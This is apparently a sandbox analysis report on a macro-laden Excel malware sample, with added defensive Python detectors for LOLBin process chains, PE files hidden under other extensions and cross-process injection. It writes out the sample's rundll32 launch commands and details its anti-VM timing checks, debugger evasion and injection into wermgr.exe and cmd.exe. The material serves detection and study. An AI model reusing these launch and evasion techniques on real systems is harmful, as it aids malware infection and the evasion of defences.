Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0007C8E0 NtQuerySystemInformation,CLSIDFromString,DuplicateHandle,HeapFree, 5_2_0007C8E0
Creates files inside the system directory
Source: C:\Windows\System32\wermgr.exe File created: C:\Windows\system32\cn\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00062810 5_2_00062810
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00084030 5_2_00084030
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00076890 5_2_00076890
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0007C8E0 5_2_0007C8E0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00065D60 5_2_00065D60
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006D180 5_2_0006D180
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006F600 5_2_0006F600
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006CE60 5_2_0006CE60
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_000756D0 5_2_000756D0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00068300 5_2_00068300
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006BB10 5_2_0006BB10
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006EF30 5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00063460 5_2_00063460
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00065460 5_2_00065460
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0007E460 5_2_0007E460
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006A0A0 5_2_0006A0A0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_000684D0 5_2_000684D0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006ACD0 5_2_0006ACD0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_000838F0 5_2_000838F0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00063D20 5_2_00063D20
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00062530 5_2_00062530
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_000611B0 5_2_000611B0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006D5D0 5_2_0006D5D0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00077A10 5_2_00077A10
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006AA20 5_2_0006AA20
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00082E50 5_2_00082E50
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00071E60 5_2_00071E60
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006CA80 5_2_0006CA80
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006C2B0 5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_000796C0 5_2_000796C0
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00080720 5_2_00080720
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00066F40 5_2_00066F40
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_000823F0 5_2_000823F0
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180011A74 9_2_0000000180011A74
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180016C20 9_2_0000000180016C20
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018000FD48 9_2_000000018000FD48
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018001AFC0 9_2_000000018001AFC0
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018000BFE4 9_2_000000018000BFE4
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800110B4 9_2_00000001800110B4
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800130E8 9_2_00000001800130E8
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800020E8 9_2_00000001800020E8
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800011DC 9_2_00000001800011DC
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018001822C 9_2_000000018001822C
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018001D2C0 9_2_000000018001D2C0
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180020300 9_2_0000000180020300
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180004320 9_2_0000000180004320
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180008444 9_2_0000000180008444
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018001C4C8 9_2_000000018001C4C8
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180001574 9_2_0000000180001574
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180003594 9_2_0000000180003594
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800076B8 9_2_00000001800076B8
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800026C0 9_2_00000001800026C0
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018003B6C4 9_2_000000018003B6C4
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180023780 9_2_0000000180023780
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180036828 9_2_0000000180036828
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180019860 9_2_0000000180019860
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180025868 9_2_0000000180025868
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800188B0 9_2_00000001800188B0
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800018CC 9_2_00000001800018CC
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018000E8EC 9_2_000000018000E8EC
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800158F8 9_2_00000001800158F8
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018003396C 9_2_000000018003396C
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180002A24 9_2_0000000180002A24
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018008FC84 9_2_000000018008FC84
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180014D24 9_2_0000000180014D24
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180002D88 9_2_0000000180002D88
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180007D89 9_2_0000000180007D89
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180083E30 9_2_0000000180083E30
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018008BE3C 9_2_000000018008BE3C
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180024EC0 9_2_0000000180024EC0
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180003F38 9_2_0000000180003F38
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018000BFE0 9_2_000000018000BFE0
Document contains embedded VBA macros
Source: SecuriteInfo.com.Heur.31681.xls OLE indicator, VBA macros: true
Yara signature match
Source: SecuriteInfo.com.Heur.31681.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@14/16@5/5
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006E420 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 5_2_0006E420
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018000B848 LookupPrivilegeValueA,AdjustTokenPrivileges, 9_2_000000018000B848
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018000BB84 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA, 9_2_000000018000BB84
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006BA20 CoCreateInstance, 5_2_0006BA20
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{79ED1AB7-4F83-DE32-0BD1-4533166B87A7}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD6CE.tmp Jump to behavior
Source: SecuriteInfo.com.Heur.31681.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\wermgr.exe System information queried: HandleInformation Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\cmd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\cmd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: SecuriteInfo.com.Heur.31681.xls ReversingLabs: Detection: 12%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW Jump to behavior
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
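Added example (not part of the Joe Sandbox report): the process chain above is the whole story of this sample in four hops, EXCEL.EXE -> rundll32 loading a non-.dll module by its StartW export -> SysWOW64 rundll32 -> wermgr.exe -> cmd.exe, plus a scheduled task (taskeng.exe) re-launching rundll32 on a .dwn file under AppData\Roaming. The detector below turns those observations into lineage and command-line checks over constructed process-creation events modelled on the "Process created" lines above. The allowlist of expected parents for wermgr.exe, the set of "user-writable" path markers and the benign control event are assumptions for this example, to be tuned per environment.

```python
import ntpath
import re
from dataclasses import dataclass

# Parent/child pairs a practitioner would alert on. EXPECTED_PARENT for wermgr.exe
# is an assumption made for this example (it is normally started by the WER service).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"rundll32.exe", "cmd.exe", "powershell.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "regsvr32.exe", "msiexec.exe"}
NO_CHILD_EXPECTED = {"wermgr.exe"}
EXPECTED_PARENT = {"wermgr.exe": {"svchost.exe"}}
# rundll32 command-line grammar: rundll32[.exe] <module>,<export>
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\"?\s+['\"]?([^'\",]+)['\"]?\s*,\s*(\S+)",
                       re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _user_writable(module: str) -> bool:
    """Relative module paths resolve against the parent's working directory (for Excel
    that is the user's Documents folder, so '..\\x.dfm' lands in the profile root);
    absolute paths are matched against profile/temp markers (assumed list)."""
    low = module.lower()
    if not re.match(r"^[a-z]:\\", low):
        return True
    return any(tag in low for tag in ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\"))


def check_event(ev: ProcEvent) -> list[str]:
    """Return one finding string per rule the event trips."""
    parent, child = _base(ev.parent_image), _base(ev.image)
    findings = []
    if parent in OFFICE_APPS and child in LOLBINS:
        findings.append(f"office-spawned-lolbin: {parent} -> {child}")
    if parent in NO_CHILD_EXPECTED:
        findings.append(f"unexpected-child: {parent} -> {child}")
    if child in EXPECTED_PARENT and parent not in EXPECTED_PARENT[child]:
        findings.append(f"unexpected-parent: {child} launched by {parent}")
    if child == "rundll32.exe":
        m = RUNDLL_RE.search(ev.command_line)
        if m:
            module, export = m.group(1).strip(), m.group(2)
            if ntpath.splitext(module)[1].lower() != ".dll":
                findings.append(f"rundll32-non-dll-module: {module} export {export}")
            if _user_writable(module):
                findings.append(f"rundll32-module-in-user-writable-path: {module}")
    return findings


def scan(events):
    """(event index, finding) pairs for a whole batch of events."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]


# Constructed events mirroring the report's chain; the last one is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r"C:\Windows\System32\rundll32.exe", r"rundll32 ..\fndskfnds.dfm,StartW"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\System32\wermgr.exe",
              r"C:\Windows\system32\wermgr.exe"),
    ProcEvent(r"C:\Windows\System32\wermgr.exe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\system32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\taskeng.exe", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

The rundll32 rule is the one with the best signal-to-noise here: legitimate rundll32 invocations name a .dll under System32 or Program Files, so a module with a foreign extension (.dfm, .dwn) or a relative path is worth an alert on its own, before any parent/child context is considered.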

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer, 4_2_6E821032
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00290B40 push dword ptr [edx+14h]; ret 4_2_00290C4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00290205 push edx; iretd 4_2_00290206
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00290AD8 push dword ptr [edx+14h]; ret 4_2_00290C4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00290B10 push dword ptr [edx+14h]; ret 4_2_00290C4D
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00086E83 push es; ret 5_2_00086F30
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018004047A push ebp; ret 9_2_000000018004047B
Source: C:\Windows\System32\cmd.exe Code function: 9_2_000000018003259D push edi; ret 9_2_000000018003259F

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fndskfnds.dfm Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fndskfnds.dfm Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fndskfnds.dfm Jump to dropped file
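Added example (not part of the Joe Sandbox report): the three signatures above all hinge on one fact, that C:\Users\user\fndskfnds.dfm is a PE image stored under an extension that is not a PE extension. The check below reproduces that classification from the file header alone (DOS "MZ" stub, e_lfanew at offset 0x3C, "PE\0\0" signature) and also reads the COFF Machine field, which is the quickest way to confirm why the 64-bit System32 rundll32 re-launched its SysWOW64 counterpart: it does that when the module it was handed is 32-bit. The stub PE built here is a constructed header-only stand-in, not the dropped file; the extension allowlist is an assumption.

```python
import ntpath
import struct

# Extensions under which a PE image is expected; anything else is a mismatch (assumed list).
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv", ".efi"}
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0xAA64: "arm64"}
COFF_HEADER_LEN = 20


def is_pe_image(data: bytes) -> bool:
    """True when data has a DOS header whose e_lfanew points at 'PE\\0\\0' followed by a full COFF header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # e_lfanew must lie past the DOS header and leave room for signature + COFF header
    if e_lfanew < 0x40 or e_lfanew + 4 + COFF_HEADER_LEN > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def pe_machine(data: bytes) -> str:
    """Architecture from the COFF Machine field; decides which rundll32 (System32 or SysWOW64) can host the module."""
    if not is_pe_image(data):
        raise ValueError("not a PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return MACHINE_NAMES.get(machine, f"unknown(0x{machine:04x})")


def extension_mismatch(path: str, data: bytes) -> bool:
    """The report's 'non-matching file extension' condition: PE content, non-PE extension."""
    ext = ntpath.splitext(path)[1].lower()
    return is_pe_image(data) and ext not in PE_EXTENSIONS


def build_stub_pe(machine: int = 0x014C) -> bytes:
    """Constructed stand-in (not loadable): DOS header, PE signature and a COFF header
    flagged as a 32-bit DLL, enough for the header checks above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, 0x2102)
    return bytes(dos) + b"PE\x00\x00" + coff


if __name__ == "__main__":
    sample = build_stub_pe()
    for name in (r"C:\Users\user\fndskfnds.dfm", r"C:\tmp\netmouser[1].dll"):
        print(name, "PE" if is_pe_image(sample) else "-", pe_machine(sample),
              "MISMATCH" if extension_mismatch(name, sample) else "ok")
```

Checking content against extension at write time (the EXCEL.EXE "File created" event above) rather than at execution time is what lets this fire before rundll32 ever runs; the same check applied to netmouser[1].dll in the IE cache would pass the extension test but still flag an Office process writing a PE file.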

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fndskfnds.dfm Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (28 identical entries)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\System32\wermgr.exe Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\wermgr.exe RDTSC instruction interceptor: First address: 0000000000067D50 second address: 0000000000067D50 instructions:
  0x00000000 rdtsc
  0x00000002 dec eax
  0x00000003 shl edx, 20h
  0x00000006 dec eax
  0x00000007 or eax, edx
  0x00000009 ret
  0x0000000a dec esp
  0x0000000b mov edi, eax
  0x0000000d call dword ptr [0002396Eh]
  0x00000013 jmp 00007FE928B24D30h
  0x00000015 jmp dword ptr [0007C47Ah]
  0x0000001b mov ecx, dword ptr [7FFE0004h]
  0x00000022 dec eax
  0x00000023 mov eax, dword ptr [7FFE0320h]
  0x0000002a dec eax
  0x0000002b imul eax, ecx
  0x0000002e dec eax
  0x0000002f shr eax, 18h
  0x00000032 ret
  0x00000033 inc esp
  0x00000034 mov esi, eax
  0x00000036 dec ecx
  0x00000037 mov eax, edi
  0x00000039 dec eax
  0x0000003a not eax
  0x0000003c dec eax
  0x0000003d mov ebx, 6CEE0E00h
  0x00000042 xor edx, edx
  0x00000044 inc ecx
  0x00000045 xchg byte ptr [eax+0Bh], cl
  0x00000048 fmul dword ptr [ebx-17280808h]
  0x0000004e aaa
  0x0000004f arpl word ptr [eax], ax
  0x00000051 add byte ptr [edi], cl
Note: wermgr.exe is a 64-bit process and the listing is a 32-bit decode of its code, so each "dec eax", "dec esp", "dec ecx", "inc ecx" and "inc esp" is a REX prefix rather than an instruction. Read as x64, the first ten bytes are rdtsc; shl rdx, 32; or rax, rdx; ret (a 64-bit timestamp-counter read), and offsets 0x1b-0x32 compute GetTickCount inline from KUSER_SHARED_DATA (TickCountMultiplier at 7FFE0004h, TickCountQuad at 7FFE0320h, product shifted right by 24). The sample is therefore comparing elapsed CPU cycles against elapsed OS ticks, a common check for time acceleration by a hypervisor or a sleep-patching sandbox. The bytes from 0x44 onward appear to be non-code data decoded as instructions.
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00067D50 rdtsc 5_2_00067D50
Contains functionality to query network adapter information
Source: C:\Windows\System32\wermgr.exe Code function: GetAdaptersInfo, 5_2_00073460
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\taskeng.exe TID: 2948 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2228 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2960 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW, 5_2_00062E60
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00063B00 FindFirstFileW, 5_2_00063B00
Source: C:\Windows\System32\cmd.exe Code function: 9_2_00000001800225AC GetSystemInfo, 9_2_00000001800225AC
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 43489 Jump to behavior
Source: C:\Windows\System32\cmd.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00067D50 rdtsc 5_2_00067D50
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00072AD0 LdrLoadDll, 5_2_00072AD0
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer, 4_2_6E821032
Enables debug privileges
Source: C:\Windows\System32\cmd.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_0006F600 SleepEx,SetTimer,RtlAddVectoredExceptionHandler, 5_2_0006F600

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write Jump to behavior
Hijacks the control flow in another process
Source: C:\Windows\System32\wermgr.exe Memory written: PID: 3068 base: 1800B5000 value: FF Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1688 base: 180079000 value: FF Jump to behavior
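Added example (not part of the Joe Sandbox report): the two signatures above, together with the "Writes to foreign memory regions" entries that follow, are three views of one injection chain: SysWOW64 rundll32 allocates an RWX region at base 60000 inside wermgr.exe and writes to it, then wermgr.exe does the same to cmd.exe and additionally writes single bytes into cmd.exe's loaded image (1800B5000, 180079000), which is how execution is redirected without a remote thread. The correlator below groups constructed cross-process memory events by (source, target) pair and names the stage reached. PID 1776 (wermgr.exe) and 3068 (cmd.exe) come from the report; the rundll32 PID, the region sizes, cmd.exe's image range and the remote-thread event for wermgr.exe are assumptions made so the example runs.

```python
from collections import defaultdict
from dataclasses import dataclass, field

RWX = "page execute and read and write"


@dataclass
class MemEvent:
    kind: str          # "alloc" | "write" | "thread"
    src_pid: int
    dst_pid: int
    address: int = 0
    size: int = 0      # allocations only
    protect: str = ""  # allocations only


@dataclass
class Track:
    """What one source process has done to one target process so far."""
    rwx_regions: list = field(default_factory=list)  # (base, size) allocated RWX by src inside dst
    writes_into_rwx: int = 0
    writes_into_image: int = 0
    other_writes: int = 0
    threads: int = 0


def _inside(addr: int, base: int, size: int) -> bool:
    return base <= addr < base + size


def correlate(events, image_ranges):
    """Map (src_pid, dst_pid) -> verdict. image_ranges gives (base, size) of each target's main module."""
    tracks = defaultdict(Track)
    for ev in events:
        if ev.src_pid == ev.dst_pid:
            continue  # a process touching its own memory is not injection
        t = tracks[(ev.src_pid, ev.dst_pid)]
        if ev.kind == "alloc":
            if ev.protect == RWX:
                t.rwx_regions.append((ev.address, ev.size))
        elif ev.kind == "write":
            base, size = image_ranges.get(ev.dst_pid, (0, 0))
            if any(_inside(ev.address, b, s) for b, s in t.rwx_regions):
                t.writes_into_rwx += 1      # payload landing in the staged region
            elif _inside(ev.address, base, size):
                t.writes_into_image += 1    # patching code the target already executes
            else:
                t.other_writes += 1
        elif ev.kind == "thread":
            t.threads += 1
    verdicts = {}
    for pair, t in tracks.items():
        if t.writes_into_rwx and (t.threads or t.writes_into_image):
            verdicts[pair] = "code-injection"       # staged payload plus a way to reach it
        elif t.writes_into_image:
            verdicts[pair] = "image-patch"          # inline hook without a staged region
        elif t.writes_into_rwx:
            verdicts[pair] = "payload-staged"       # written, execution not yet observed
        elif t.rwx_regions:
            verdicts[pair] = "foreign-rwx-alloc"
        else:
            verdicts[pair] = "foreign-write"
    return verdicts


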